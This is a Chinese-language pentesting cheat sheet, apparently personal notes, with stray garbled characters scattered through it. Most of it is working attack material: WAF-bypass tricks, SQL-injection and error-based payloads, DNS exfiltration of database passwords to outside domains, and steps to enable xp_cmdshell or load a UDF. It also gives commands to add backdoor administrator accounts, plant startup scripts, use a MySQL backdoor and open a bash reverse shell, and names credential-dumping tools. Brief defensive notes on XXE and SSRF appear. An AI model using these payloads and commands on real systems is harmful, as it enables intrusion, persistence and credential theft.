******【【【【【【【代碼審計(jì)】】】---

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執(zhí)行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

******【【【【【【【繞過(guò)walf】】】----------------------------------------------------------------

1酣倾、關(guān)鍵字可以用%（只限IIS系列）砂沛。比如select烧颖，可以sel%e%ct倦西。原理：網(wǎng)絡(luò)層waf對(duì)SEL%E%CT進(jìn)行url解碼后變成SEL%E%CT躲叼，匹配select失敗缀台，而進(jìn)入asp.dll對(duì)SEL%E%CT進(jìn)行url解碼卻變成select幔翰。IIS下的asp.dll文件在對(duì)asp文件后參數(shù)串進(jìn)行url解碼時(shí)伪嫁，會(huì)直接過(guò)濾掉09-0d（09是tab鍵,0d是回車）领炫、20（空格）、%(后兩個(gè)字符有一個(gè)不是十六進(jìn)制)字符张咳。xss也是同理帝洪。

2似舵、通殺的，內(nèi)聯(lián)注釋碟狞。安全狗不攔截啄枕，但是安全寶、加速樂(lè)族沃、D盾等频祝，看到/*!/就Fack了，所以只限于安全狗脆淹。比如：/*!select*/

3常空、編碼。這個(gè)方法對(duì)waf很有效果盖溺，因?yàn)橐话鉾af會(huì)解碼漓糙，但是我們利用這個(gè)特點(diǎn)，進(jìn)行兩次編碼烘嘱，他解了第一次但不會(huì)解第二次昆禽，就bypass了。騰訊waf蝇庭、百度waf等等都可以這樣bypass的醉鳖。

4，繞過(guò)策略一：偽造搜索引擎

早些版本的安全狗是有這個(gè)漏洞的哮内，就是把User-Agent修改為搜索引擎

5盗棵，360webscan腳本存在這個(gè)問(wèn)題，就是判斷是否為admin dede install等目錄北发，如果是則不做攔截

1.? ? GET /pen/news.php?id=1 union select user,password from mysql.user

1.? ? GET /pen/news.php/admin?id=1 union select user,password from mysql.user

1.? ? GET /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6纹因，multipart請(qǐng)求繞過(guò)，在POST請(qǐng)求中添加一個(gè)上傳文件琳拨，繞過(guò)了絕大多數(shù)WAF瞭恰。

7，參數(shù)繞過(guò)狱庇，復(fù)制參數(shù)寄疏，id=1&id=1

用一些特殊字符代替空格，比如在mysql中%0a是換行僵井，可以代替空格陕截，這個(gè)方法也可以部分繞過(guò)最新版本的安全狗，在sqlserver中可以用/**/代替空格

8,內(nèi)聯(lián)注釋批什，

文件上傳农曲，復(fù)制文件包一份再加一份

在 form-data;后面增加一定的字符

******【【【【【【【【寬字符注入】】】--------------------------------------------------------------

寬字符：解 決方法：就是在初始化連接和字符集之后，使用SET character_set_client=binary來(lái)設(shè)定客戶端的字符集是二進(jìn)制的。修改Windows下的MySQL配置文件一般是 my.ini乳规，Linux下的MySQL配置文件一般是my.cnf形葬，比如：mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL語(yǔ)句的編碼暮的，如果設(shè)置為 binary笙以，MySQL就以二進(jìn)制來(lái)執(zhí)行，這樣寬字節(jié)編碼問(wèn)題就沒(méi)有用武之地了冻辩。

http://wenku.baidu.com/link?url=F4Cq18NYdsnATq3eqtr3zCWLKExoEYV62yJp5zsfM5c85iv4rldTvl1A_SGilEAiWB_O_hg0C9A8VLoIT4K_HxyyF0Z7xo5Pihh1VxxYa4QGiXQ_wGDjiOFHubYvshgl

******【【【【【【【oracle注入】】】--------------------------------------------------------------

【漏洞名稱】 sys.dbms_export_extension.get_domain_index_metadata 提升權(quán)限漏洞

【影響平臺(tái)】Oracle 8i / 9i / 10g / XE

【風(fēng)險(xiǎn)等級(jí)】高【攻擊需求】較低權(quán)限賬號(hào)

【造成危害】取得管理員權(quán)限

******mysql4和mysql5的區(qū)別---------------------------------------------------

mysql 5.0,增加了infomaction數(shù)據(jù)庫(kù)猖腕，存儲(chǔ)過(guò)程，視圖恨闪，

******xss 掛馬倘感，ddos攻擊，csrf--------

htmlspecialchars將與咙咽、單雙引號(hào)老玛、大于和小于號(hào)化成HTML格式

htmlentities() 所有字符都轉(zhuǎn)成實(shí)體，strip_tags 去掉HTML和php標(biāo)記

http://www.cnblogs.com/siqi/p/4117421.html

******【【【【【【【mssql提權(quán)】】】---------------------------------------------------------------

首先看看xp_cmdshell存在不,不存在的話先恢復(fù)下钧敞。

Exec sp_configure show advanced options,1;RECONFIGURE;EXEC sp_configure xp_cmdshell,1;RECONFIGURE;

;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;--

如果cmdshell還不行的話蜡豹，就再運(yùn)行：;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--

或者;sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll來(lái)恢復(fù)cmdshell。

3 無(wú)法在庫(kù) xpweb70.dll 中找到函數(shù) xp_cmdshell溉苛。原因: 127(找不到指定的程序余素。)

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行:exec sp_dropextendedproc xp_cmdshell

第二步執(zhí)行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll

然后按F5鍵命令執(zhí)行完畢

四.終極方法.

如果以上方法均不可恢復(fù),請(qǐng)嘗試用下面的辦法直接添加帳戶:

查詢分離器連接后,

2000servser系統(tǒng):

declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net user dell huxifeng007 /add

declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net localgroup administrators dell /add

sql2008 提權(quán) 低權(quán)限運(yùn)行

******【【【【【【【mssql提權(quán)錯(cuò)誤5 cmd權(quán)限不足】】】-------------------------------------

錯(cuò)誤代碼”5″，馬上google之炊昆。由于xp_cmdshell是嚴(yán)格用%systemroot%\system32\cmd.exe去執(zhí)行所提交的命令的，提示”5″威根，意思是cmd的權(quán)限不足凤巨，就是說(shuō)system32下的cmd.exe被降權(quán)了。當(dāng)然也有繞過(guò)的方法洛搀，比如啟用沙盒模式執(zhí)行shell命令：

*******【【【【【【【mssql2008 sqlmap ,提權(quán)成功】】】---------------------------------

http://www.freebuf.com/articles/web/10280.html

2008sa權(quán)限敢茁，用sqlmap提權(quán)成功。

第一種函數(shù)

select name from sysobjects where xtype=u? 通過(guò)這個(gè)來(lái)爆第一個(gè)表

select name from sysobjects where xtype=u and name not in(爆出來(lái)的表1留美，爆出來(lái)的表2...)

一直爆下去彰檬，直到找到我們所需要的表位置

第二種函數(shù)

select table_name from information_schema.tables

select table_name from information_schema.tables where table_name not in (爆出來(lái)的表1，爆出來(lái)的表2...)谎砾。

******【【【【【【【XXE漏洞】】】--------------------------------------------

引用外部實(shí)體? ?

或者? ? ? ? ? ?

當(dāng)允許引用外部實(shí)體時(shí)逢倍，通過(guò)構(gòu)造惡意內(nèi)容，

1可導(dǎo)致讀取任意文件景图、2執(zhí)行系統(tǒng)命令较雕、3探測(cè)內(nèi)網(wǎng)端口、4攻擊內(nèi)網(wǎng)網(wǎng)站等危害。

對(duì)于不同XML解析器,對(duì)外部實(shí)體有不同處理規(guī)則,在PHP中默認(rèn)處理的函數(shù)為: xml_parse和simplexml_load xml_parse的實(shí)現(xiàn)方式為expat庫(kù)亮蒋，默認(rèn)情況不會(huì)解析外部實(shí)體,而simplexml_load默認(rèn)情況下會(huì)解析外部實(shí)體,造成安全威脅.除PHP外扣典，在Java，Python等處理xml的組件及函數(shù)中都可能存在此問(wèn)題

https://www.waitalone.cn/xxe-attack.html

XXE漏洞 http://www.91ri.org/9539.html

[

0x04 防御

方案一慎玖、使用開(kāi)發(fā)語(yǔ)言提供的禁用外部實(shí)體的方法

libxml_disable_entity_loader(true);

方案二贮尖、過(guò)濾用戶提交的XML數(shù)據(jù)

1.檢查所使用的底層xml解析庫(kù)，默認(rèn)禁止外部實(shí)體的解析

2.使用第三方應(yīng)用代碼及時(shí)升級(jí)補(bǔ)丁

3.同時(shí)增強(qiáng)對(duì)系統(tǒng)的監(jiān)控趁怔，防止此問(wèn)題被人利用

對(duì)于PHP,由于simplexml_load_string函數(shù)的XML解析問(wèn)題出在libxml庫(kù)上,所以加載實(shí)體前可以調(diào)用這樣一個(gè)函數(shù)

借助XXE,攻擊者可以實(shí)現(xiàn)任意文件讀取,DOS拒絕服務(wù)攻擊以及代理掃描內(nèi)網(wǎng)等.

-------------------------------------

gpc 魔術(shù)引號(hào) on http://www.jb51.net/article/38990

.htm

------------------------------

******【【【【【【【MYSQL提權(quán)】】】------------------------------

一 UDF提權(quán)

這類提權(quán)方法我想大家已經(jīng)知道了湿硝，我大致寫(xiě)一下，具體語(yǔ)句如下：

create function cmdshell returns string soname ’udf.dll’

select cmdshell(’net user iis_user 123!@#abcABC /add’);

select cmdshell(’net localgroup administrators iis_user /add’);

select cmdshell(’regedit /s d:web3389.reg’);

drop function cmdshell;

select cmdshell(’netstat -an’);

二 VBS啟動(dòng)項(xiàng)提權(quán)

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC/add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );

select * from a into outfile "C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\a.vbs";

三 Linx MySQL BackDoor提權(quán)

Linx Mysql Door

Mysql BackDoor是一款針對(duì)PHP+Mysql服務(wù)器開(kāi)發(fā)的后門(mén),該后門(mén)安裝后為Mysql增加一個(gè)可以執(zhí)行系統(tǒng)命令的"state"函數(shù),并且隨Mysql進(jìn)程啟動(dòng)一個(gè)基于Dll的嗅探型后門(mén),這個(gè)后門(mén)在Windows下?lián)碛信cMysql一樣的系統(tǒng)權(quán)限,從而巧妙的實(shí)現(xiàn)了無(wú)端口,無(wú)進(jìn)程,無(wú)服務(wù)的穿墻木馬.

用法：將Mysql.php傳到PHP服務(wù)器上,點(diǎn)擊"自動(dòng)安裝Mysql BackDoor"痕钢，然后直接執(zhí)行命令即可

四图柏，MIX.DLL提權(quán)

http://www.freebuf.com/vuls/85021.html

1，在獨(dú)立IP的sqlmap下運(yùn)

2任连，禁用本地緩存 net stop dns

3蚤吹，http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT hex(user())),'.abc.com\\foobar'))),1,1)%23

http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where user='root' limit 1),'.md5crack.cn\\foobar'))),1,1)%23

https://sanwen8.cn/p/1acWt8J.html? DNS突破

******【【【【【【【SSRF】】】----------------------------------------------------

SSRF(Server-Side Request Forgery:服務(wù)器端請(qǐng)求偽造) 是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請(qǐng)求的一個(gè)安全漏洞。一般情況下随抠，SSRF攻擊的目標(biāo)是從外網(wǎng)無(wú)法訪問(wèn)的內(nèi)部系統(tǒng)

***--------------------------

SSRF統(tǒng)一錯(cuò)誤信息裁着，避免用戶可以根據(jù)錯(cuò)誤信息來(lái)判斷遠(yuǎn)程服務(wù)器端口狀態(tài)

2.限制請(qǐng)求的端口為HTTP常用的端口，比如 80,443,8080,8088等

3.黑名單內(nèi)網(wǎng)IP拱她。

4.禁用不需要的協(xié)議二驰，僅僅允許HTTP和HTTPS.

******【【【【【【【PHP命令執(zhí)行】】】-----------------------------------------------------

system,exec,shell_exec,paassthru,popen,proc_popen,

反彈shell? 公網(wǎng)服務(wù)器執(zhí)行 nc –lvv 8888

目標(biāo)服務(wù)器上執(zhí)行?cmd= bash -i >& /dev/tcp/10.0.0.1/8888 0>&1

并在disabl_functions中禁用

******【【【【【【【任意文件下載，限制php.ini open_basedir 限定文件的訪問(wèn)范】】】

******【【【【【【【文件包含漏洞】】】-----------------------------

? 配合文件上傳漏洞GetShell? 可以執(zhí)行任意腳本代碼 ? 網(wǎng)站源碼文件以及配置文件泄露? 遠(yuǎn)程包含GetShell? 控制整個(gè)網(wǎng)站甚至是服務(wù)器

allow_url_fopen和allow_url_include為ON的話秉沼，則包含的文件可以是第三方服務(wù)器中的文件桶雀，這樣就形成了遠(yuǎn)程文件包含漏洞

/etc/passwd%00 ? 需要 magic_quotes_gpc=off,PHP小于5.3.4有效

? /etc/passwd././././././././././././.[......]/././././././././.

? php版本小于5.2.8可以成功，linux需要文件名長(zhǎng)于4096唬复，windows需要長(zhǎng)于256

index.php?page=php://filter/read/=convert.base64-encode/resource=index.php

******【【【【【【【文件上傳矗积，js檢測(cè)伦糯，MIME類型檢測(cè)Content-Type,文件內(nèi)容昨登，服務(wù)端目】】】錄-------------------------------------------------------------

通過(guò)抓包截?cái)鄬?eval.php.jpg 換成 eval.php_jpg(下劃線為0x00)。在上

傳文件時(shí)系統(tǒng)文件遇到0x00默勾。會(huì)認(rèn)為文件已經(jīng)結(jié)束休建。從而將eval.php.jpg的內(nèi)

容寫(xiě)入到eval.php中乍恐。

。htaccess文件內(nèi)容

SetHandler application/x-httpd-php

文件幻數(shù)檢測(cè) jpg(JFIF) gif(GIF89a) png(%PNG)

apache解析漏洞测砂，2.0-2.2 IIS7.5解析漏洞茵烈，任意文件名后加.php

nginx<0.8.32 1.jpg/1.php

nginx>0.8.41<1.5.6,1.jpg%20%00.php解析

******【【【【【【【and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

1、通過(guò)floor報(bào)錯(cuò) 向下取整

+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()select * from test where id=1 and exp(~(select * from(select user())a));

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

addslashes() 函數(shù)返回在預(yù)定義字符之前添加反斜杠的字符串

******SQL注入（Sql Injection ）是一種將SQL語(yǔ)句插入或添加到應(yīng)用(用戶)的輸入

參數(shù)中的攻擊砌些，之后再將這些參數(shù)傳遞給后臺(tái)的SQL服務(wù)器加以解析并執(zhí)行瞧毙。----------------------

******【【【【【【【HTTP協(xié)議head 這個(gè)方法的功能與get方法相似，】】】不同之處在于HEAD。這個(gè)方法的功能與GET方法相似宙彪，不同之處在

于服務(wù)器不會(huì)在其相應(yīng)中返回消息主體矩动。

? TRACE。這種方法主要用于診斷释漆。

? OPTIONS悲没。這種方法要求服務(wù)器報(bào)告對(duì)某一特殊資源有效的HTTP方法。

? PUT男图。這個(gè)方法試圖使用包含在請(qǐng)求主體中的內(nèi)容示姿，向服務(wù)器上傳制定的資源

****** 各種注釋#-- -- - --+ // /**/ 空白字符，+號(hào)逊笆，-號(hào)栈戳，～號(hào)，难裆！號(hào)子檀，@形式{} %0a-----------------------------

------------------------------------------------------

域和組的區(qū)別編輯

工作組是一群計(jì)算機(jī)的集合，它僅僅是一個(gè)邏輯的集合乃戈，各自計(jì)算機(jī)還是各自管理的褂痰，你要訪問(wèn)其中的計(jì)算機(jī)，還是要到被訪問(wèn)計(jì)算機(jī)上來(lái)實(shí)現(xiàn)用戶驗(yàn)證的症虑。而域不同缩歪，域是一個(gè)有安全邊界的計(jì)算機(jī)集合，在同一個(gè)域中的計(jì)算機(jī)彼此之間已經(jīng)建立了信任關(guān)系谍憔，在域內(nèi)訪問(wèn)其他機(jī)器匪蝙，不再需要被訪問(wèn)機(jī)器的許可了。為什么是這樣的呢习贫？因?yàn)樵诩尤胗虻臅r(shí)候逛球，管理員為每個(gè)計(jì)算機(jī)在域中（可和用戶不在同一域中）建立了一個(gè)計(jì)算機(jī)帳戶，這個(gè)帳戶和用戶帳戶一樣沈条，也有密碼保護(hù)的∽缏可是大家要問(wèn)了蜡歹，我沒(méi)有輸入過(guò)什么密碼啊，是的涕烧，你確實(shí)沒(méi)有輸入月而，計(jì)算機(jī)帳戶的密碼不叫密碼，在域中稱為登錄憑據(jù)议纯，它是由2000的DC（域控制器）上的KDC服務(wù)來(lái)頒發(fā)和維護(hù)的父款。為了保證系統(tǒng)的安全，KDC服務(wù)每30天會(huì)自動(dòng)更新一次所有的憑據(jù)，并把上次使用的憑據(jù)記錄下來(lái)憨攒。周而復(fù)始世杀。也就是說(shuō)服務(wù)器始終保存著2個(gè)憑據(jù)，其有效時(shí)間是60天肝集，60天后瞻坝，上次使用的憑據(jù)就會(huì)被系統(tǒng)丟棄。如果你的GHOST備份里帶有的憑據(jù)是60天的杏瞻，那么該計(jì)算機(jī)將不能被KDC服務(wù)驗(yàn)證所刀，從而系統(tǒng)將禁止在這個(gè)計(jì)算機(jī)上的任何訪問(wèn)請(qǐng)求（包括登錄），解決的方法呢捞挥，簡(jiǎn)單的方法使將計(jì)算機(jī)脫離域并重新加入浮创，KDC服務(wù)會(huì)重新設(shè)置這一憑據(jù)∑龊或者使用2000資源包里的NETDOM命令強(qiáng)制重新設(shè)置安全憑據(jù)斩披。因此在有域的環(huán)境下，請(qǐng)盡量不要在計(jì)算機(jī)加入域后使用GHOST備份系統(tǒng)分區(qū)胸嘴，如果作了雏掠，請(qǐng)?jiān)诨謴?fù)時(shí)確認(rèn)備份是在60天內(nèi)作的，如果超出劣像，就最好聯(lián)系你的系統(tǒng)管理員乡话，你可以需要管理員重新設(shè)置計(jì)算機(jī)安全憑據(jù)，否則你將不能登錄域環(huán)境耳奕。

域和工作組適用的環(huán)境不同绑青，域一般是用在比較大的網(wǎng)絡(luò)里，工作組則較小屋群，在一個(gè)域中需要一臺(tái)類似服務(wù)器的計(jì)算機(jī)闸婴，叫域控服務(wù)器，其他電腦如果想互相訪問(wèn)首先都是經(jīng)過(guò)它的芍躏，但是工作組則不同邪乍，在一個(gè)工作組里的所有計(jì)算機(jī)都是對(duì)等的，也就是沒(méi)有服務(wù)器和客戶機(jī)之分的对竣，但是和域一樣庇楞，如果一臺(tái)計(jì)算機(jī)想訪問(wèn)其他計(jì)算機(jī)的話首先也要找到這個(gè)組中的一臺(tái)類似組控服務(wù)器，組控服務(wù)器不是固定的否纬，以選舉的方式實(shí)現(xiàn)吕晌，它存儲(chǔ)著這個(gè)組的相關(guān)信息，找到這臺(tái)計(jì)算機(jī)后得到組的信息然后訪問(wèn)临燃。

******【【【【【【【提權(quán)】】】---------------------------------------------

systeminfo 查看修補(bǔ)補(bǔ)訂

systeminfo

查看未修補(bǔ)的補(bǔ)丁編號(hào)

KB952004 MS09-012? ? ? ? PR? ? -pr.exe

KB956572 MS09-012? ? ? ? 巴西烤肉

KB970483 MS09-020? ? ? ? IIS6溢出? ? -iis6.exe

LPK劫持? ? -lpk.dll

windows 2003>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191

KB2840221 KB3000061 KB2850851 KB2711167 KB2360937

KB2478960 KB2507938 KB2566454 KB2646524 KB2645640

KB2641653 KB944653 KB952004 KB971657 KB2620712

KB2393802 KB942831 KB2503665 KB2592799 KB956572

KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|

@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows

\Temp\temp.txt

通用型>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280

KB3143141 KB3134228 KB3079904 KB3077657 KB3124280

KB3045171 KB2829361 KB3000061 KB2850851 KB2707511

KB970483 KB2124261 KB2271195) do @type C:\Windows

\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /

q /a C:\Windows\Temp\temp.txt

接下來(lái) 可以

修改管理員密碼

創(chuàng)建一個(gè)新用戶 添加到管理員組

提取當(dāng)前登錄用戶密碼? （Getpass.exe）

修改幫助賬號(hào)（SUPPOTR_338945a0）的密碼睛驳，并添加管理員組 (比較不容易被發(fā)現(xiàn)烙心，推薦使用)

提取用戶密碼哈希值（wce.exe）

linux 臟牛漏洞，系統(tǒng)自身漏洞

ftp-serv-u

mof mysql提權(quán)

administrator以上權(quán)限

當(dāng)前管理員沒(méi)有注銷登錄（query user 命令查看）

工具： mimkatz

getpass

工具：-------------到處hash

wce

gethash

hashdump

SAMInside讀取系統(tǒng)用戶密碼 administrator

Pwdump7這個(gè)工具是一個(gè)命令行工具Win7下測(cè)試直接是空白輸出乏沸，在2003下能出來(lái)hash如果使用腳本來(lái)破解的話淫茵，那樣的話會(huì)打開(kāi)兩個(gè)在線破解hash的網(wǎng)站，同時(shí)打開(kāi)導(dǎo)出的結(jié)果

可運(yùn)用的sql函數(shù)&關(guān)鍵字：

MySQL：

union distinct

union distinctrow

procedure analyse()

updatexml()

extracavalue()

exp()

ceil()

atan()

sqrt()

floor()

ceiling()

tan()

rand()

sign()

greatest()

字符串截取函數(shù)

Mid(version(),1,1)

Substr(version(),1,1)

Substring(version(),1,1)

Lpad(version(),1,1)

Rpad(version(),1,1)

Left(version(),1)

reverse(right(reverse(version()),1)

字符串連接函數(shù)

concat(version(),'|',user());

concat_ws('|',1,2,3)

字符轉(zhuǎn)換

Char(49)

Hex('a')

Unhex(61)

過(guò)濾了逗號(hào)

(1)limit處的逗號(hào)：

limit 1 offset 0

(2)字符串截取處的逗號(hào)

mid處的逗號(hào)：

mid(version() from 1 for 1)

MSSQL：

IS_SRVROLEMEMBER()

IS_MEMBER()

HAS_DBACCESS()

convert()

col_name()

object_id()

is_srvrolemember()

is_member()

字符串截取函數(shù)

Substring(@@version,1,1)

Left(@@version,1)

Right(@@version,1)

(2)字符串轉(zhuǎn)換函數(shù)

Ascii('a') 這里的函數(shù)可以在括號(hào)之間添加空格的屎蜓，一些waf過(guò)濾不嚴(yán)會(huì)導(dǎo)致bypass

Char('97')

exec